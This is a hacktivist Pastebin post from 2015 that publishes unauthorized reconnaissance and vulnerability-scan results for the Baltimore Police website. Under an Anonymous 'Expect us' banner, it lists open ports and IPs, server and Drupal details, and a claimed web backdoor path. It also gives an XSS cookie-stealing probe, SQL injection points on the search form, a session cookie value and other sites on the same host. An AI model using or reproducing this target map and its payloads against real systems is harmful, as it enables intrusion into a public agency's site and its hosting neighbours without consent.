"EXploitation/baltimorepolice.org" By Sneakyone12 (https://pastebin.com/u/Sneakyone12) URL: https://pastebin.com/am4Jc4nJ Created on: Wednesday 29th of April 2015 01:45:47 PM CDT Retrieved on: Saturday 31 of October 2020 06:10:30 AM UTC We are Anonymous We are Legion We do not ForGive We do not ForGet Expect us.. Rise of The Hacktivist.... Pentest of baltimorepolice.org @ 78% >>> Enjoy :)) #Lulz http://www.baltimorepolice.org/ ----------------------------- Server Type: nginx - IP Address: 23.253.170.199 scan report for www.baltimorepolice.org (23.253.170.199) Host is up (0.071s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https -------------------------/ Name Servers ============/ ns87.worldnic.com: 207.204.40.144 - scan report for 207.204.40.144 Host is up (0.035s latency). PORT STATE SERVICE 53/tcp open domain 80/tcp open http ---- ns88.worldnic.com: 207.204.21.144 - scan report for 207.204.21.144 Host is up (0.0078s latency). PORT STATE SERVICE 80/tcp open http -----------------------/ HTTP Headers for www.baltimorepolice.org =========================================/ HTTP/1.1 200 OK Cache-Control: public, max-age=86400 Content-Language: en Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 28 Apr 2015 19:05:12 GMT Server: nginx X-Drupal-Cache: HIT X-Generator: Drupal 7 (http://drupal.org) X-Pantheon-Endpoint: 36234664-8913-4aec-b6dd-0dd1f4642920 X-Pantheon-Styx-Hostname: styxf9257755 X-Powered-By: PHP/5.3.29 X-Styx-Build-Date: Tue Apr 28 03:42:27 UTC 2015 X-Styx-Build-Num: 942 X-Styx-Build-Sha: fd514102420d3e89eba15e69540af0a692649330 X-Styx-Req-Id: styx-f920cfb93db3f8f058d581ab467bdf8b X-Styx-Version: StyxGo Date: Wed, 29 Apr 2015 15:55:41 GMT X-Varnish: 2782104623 2761980092 Age: 74982 Via: 1.1 varnish Connection: close Vary: Accept-Encoding, Cookie, Cookie X-Pre-Strip-Debug: Location: ==============================================================/ http://www.baltimorepolice.org/robots.txt ----------------------------------------/ # # robots.txt User-agent: * Crawl-delay: 10 # Directories Disallow: /includes/ Disallow: /misc/ Disallow: /modules/ Disallow: /profiles/ Disallow: /scripts/ Disallow: /themes/ # Files Disallow: /CHANGELOG.txt Disallow: /cron.php Disallow: /INSTALL.mysql.txt Disallow: /INSTALL.pgsql.txt Disallow: /INSTALL.sqlite.txt Disallow: /install.php Disallow: /INSTALL.txt Disallow: /LICENSE.txt Disallow: /MAINTAINERS.txt Disallow: /update.php Disallow: /UPGRADE.txt Disallow: /xmlrpc.php # Paths (clean URLs) Disallow: /admin/ Disallow: /comment/reply/ Disallow: /filter/tips/ Disallow: /node/add/ Disallow: /search/ Disallow: /user/register/ Disallow: /user/password/ Disallow: /user/login/ Disallow: /user/logout/ # Paths (no clean URLs) Disallow: /?q=admin/ Disallow: /?q=comment/reply/ Disallow: /?q=filter/tips/ Disallow: /?q=node/add/ Disallow: /?q=search/ Disallow: /?q=user/password/ Disallow: /?q=user/register/ Disallow: /?q=user/login/ Disallow: /?q=user/logout/ ====================================================================/ EXPLOITS: to www.baltimorepolice.org. =====================================/ A web backdoor was found at: "http://www.baltimorepolice.org/user/locus.php"; this could indicate that the server was hacked. GET http://www.baltimorepolice.org/user/locus.php HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/CHANGELOG.txt". Vulnerability description: "A changelog was found. GET http://www.baltimorepolice.org/CHANGELOG.txt HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.mysql.txt". Vulnerability description: "Drupal installation file found." GET http://www.baltimorepolice.org/INSTALL.mysql.txt HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.pgsql.txt". Vulnerability description: "Drupal installation file found." GET http://www.baltimorepolice.org/INSTALL.pgsql.txt HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/xmlrpc.php". Vulnerability description: "xmlrpc.php was found. GET http://www.baltimorepolice.org/xmlrpc.php HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/LICENSE.txt". Vulnerability description: "License file found may identify site software." GET http://www.baltimorepolice.org/LICENSE.txt HTTP/1.1 Host: www.baltimorepolice.org Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/install.php". Vulnerability description: "Drupal install.php file found.". GET http://www.baltimorepolice.org/install.php HTTP/1.1 Host: www.baltimorepolice.org Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/UPGRADE.txt". Vulnerability description: "Default file found.". GET http://www.baltimorepolice.org/UPGRADE.txt HTTP/1.1 Host: www.baltimorepolice.org Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.txt". Vulnerability description: "Default file found." GET http://www.baltimorepolice.org/INSTALL.txt HTTP/1.1 Host: www.baltimorepolice.org Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?topic=<script>alert(document.cookie)</script>%20". Vulnerability description: GET http://www.baltimorepolice.org/index.php? HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?SqlQuery=test%20". Vulnerability description: GET http://www.baltimorepolice.org/index.php? HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?pymembs=admin". Vulnerability description: GET http://www.baltimorepolice.org/index.php? HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?IDAdmin=test". Vulnerability description: GET http://www.baltimorepolice.org/index.php? HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?base=test%20". Vulnerability description: GET http://www.baltimorepolice.org/index.php? HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/user/". Vulnerability description: "This might be interesting. GET http://www.baltimorepolice.org/user/ HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/sitemap.xml". Vulnerability description: "This gives a nice listing of the site content." GET http://www.baltimorepolice.org/sitemap.xml HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?module=My_eGallery". Vulnerability description: "My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection." GET http://www.baltimorepolice.org/index.php? HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/web.config". Vulnerability description: "ASP config file found.". GET http://www.baltimorepolice.org/web.config HTTP/1.1 Host: www.baltimorepolice.org ----/ "X-Powered-By" header for this HTTP server is: "PHP/5.3.29" --/ The URL "http://www.baltimorepolice.org/" has the following allowed methods: *, GET, HEAD, POST. --/ The server header for the remote web server is: "nginx" --/ The target site *has* a DNS wildcard configuration -- The contents of http://23.253.170.199 differ from the contents of http://www.baltimorepolice.org --/ The remote web server seems to have a reverse proxy installed. --/ Manual verification required] The response body for a request with a trailing dot in the domain, and the response body without a trailing dot in the domain differ. This could indicate a misconfiguration in the virtual host settings. In some cases, this misconfiguration permits the attacker to read the source code of the web application GET http://www.baltimorepolice.org HTTP/1.1 Host: www.baltimorepolice.org ----/ [Manual verification required] The response body for a request with a trailing dot in the domain, and the response body without a trailing dot in the domain differ. This could indicate a misconfiguration in the virtual host settings. In some cases, this misconfiguration permits the attacker to read the source code of the web application GET http://www.baltimorepolice.org/install.php HTTP/1.1 Host: www.baltimorepolice.org ----/ Found 2 URLs and 11 different points of injection. SQL --/ http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="en-US") --/ http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="ru") --/ http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="zh-TW") --/ http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="en-US") --/ http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="ru") --/ http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="zh-TW") --/ http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="en-US") -- http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="ru") -- http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="zh-TW") --/ http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-XQlBj...", form_id="search_blo...") =====================================================================/ [*] CNAME www.baltimorepolice.org live-baltopd.pantheon.io [*] CNAME live-baltopd.pantheon.io styx-01.pantheon.io [*] A styx-01.pantheon.io 23.253.170.199 [*] A styx-01.pantheon.io 192.237.244.66 [*] A styx-01.pantheon.io 23.253.58.7 [*] CNAME www.baltimorepolice.org live-baltopd.pantheon.io [*] CNAME live-baltopd.pantheon.io styx-01.pantheon.io [*] AAAA styx-01.pantheon.io 2001:4801:7825:101:be76:4eff:fe11:8f4f [*] AAAA styx-01.pantheon.io 2001:4801:7822:101:be76:4eff:fe10:959b [*] AAAA styx-01.pantheon.io 2001:4801:7824:102:be76:4eff:fe10:8f3a ======================================================================/ ----- www.baltimorepolice.org ----- Host's addresses: __________________ styx-01.pantheon.io 5 IN A 23.253.170.199 styx-01.pantheon.io 5 IN A 192.237.244.66 styx-01.pantheon.io 5 IN A 23.253.58.7 ========================================================================/ 23.253.170.199 17 site(s) hosted on ip 23.253.170.199 Location: San Antonio,United States eaglecreek.com baltimorepolice.org perc.org the200acres.com goldmanprize.org servicesource.com newstatesman.com equalityontrial.com homeperformance.org hobostrom.com colt.net bpihomeowner.org insideclimatenews.org iescustomstaffing.com cdobs.com what-is-fracking.com revealnews.org =================================================================/ Testing SSL server 23.253.170.199 on port 443 --------------------------------------------- Accepted TLSv1 256 bits AES256-SHA - Accepted TLSv1 128 bits AES128-SHA - Accepted TLSv1 168 bits DES-CBC3-SHA - Prefered Server Cipher(s): TLSv1 128 bits AES128-SHA SSL Certificate: Version: 2 Serial Number: -4294967295 Signature Algorithm: sha256WithRSAEncryption Issuer: /C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA Not valid before: Sep 18 00:00:00 2014 GMT Not valid after: Nov 25 12:00:00 2015 GMT Subject: /C=US/ST=California/L=San Francisco/O=Pantheon Systems, Inc./CN=*.pantheon.io Public Key Algorithm: rsaEncryption RSA Public Key: (2048 bit) Modulus (2048 bit): 00:e7:e0:cb:4f:d8:3c:4c:33:f0:b4:2d:2a:99:b2: ff:9b:94:a3:75:60:e8:73:45:0c:3d:73:ff:31:a4: 54:f7:13:08:2e:0e:76:7a:ce:7f:50:4a:05:3c:fe: 61:3b:37:30:78:32:47:45:29:48:4d:69:c6:b8:d9: 56:1f:a9:02:f3:3f:43:45:d5:2e:ff:3b:d3:73:60: f8:b1:45:e7:bb:ba:a3:60:c1:e0:d1:68:e2:e5:92: 04:45:32:3f:a1:b9:1c:65:3c:ba:fa:43:31:c4:03: 5a:d8:42:f5:41:1e:04:d1:e9:b2:93:49:ff:ca:09: a3:07:34:da:ab:44:85:29:d2:20:c0:58:60:e2:3b: f9:04:cd:50:90:20:f4:bf:55:f7:c3:ac:93:ec:fd: 02:b7:78:39:e5:b7:92:82:f5:45:e5:56:a0:15:e5: 2e:b0:d2:b5:96:c9:82:03:be:b4:22:a9:e4:f9:8a: 0e:34:c7:5f:a4:33:64:6a:8f:5f:25:44:65:73:93: 9a:9e:a6:4d:86:1f:7d:d8:a3:96:13:7d:f3:05:1e: 39:a2:86:2f:c9:3a:58:02:94:00:48:6d:f3:9f:af: d7:7d:01:c4:0a:5f:57:5c:a6:b0:fe:af:6c:69:be: 47:eb:9b:82:ba:f7:65:2e:1a:51:02:2e:ab:dd:ff: a4:a9 Exponent: 65537 (0x10001) X509v3 Extensions: X509v3 Authority Key Identifier: keyid:0F:80:61:1C:82:31:61:D5:2F:28:E7:8D:46:38:B4:2C:E1:C6:D9:E2 X509v3 Subject Key Identifier: 53:89:42:63:7A:53:86:B9:25:90:BA:DE:C6:77:0A:E6:4F:70:DF:8E X509v3 Subject Alternative Name: DNS:*.pantheon.io, DNS:pantheon.io, DNS:*.gotpantheon.com, DNS:gotpantheon.com, DNS:*.getpantheon.com, DNS:getpantheon.com X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: URI:http://crl3.digicert.com/ssca-sha2-g3.crl URI:http://crl4.digicert.com/ssca-sha2-g3.crl X509v3 Certificate Policies: Policy: 2.16.840.1.114412.1.1 CPS: https://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt X509v3 Basic Constraints: critical CA:FALSE =============================================================================================//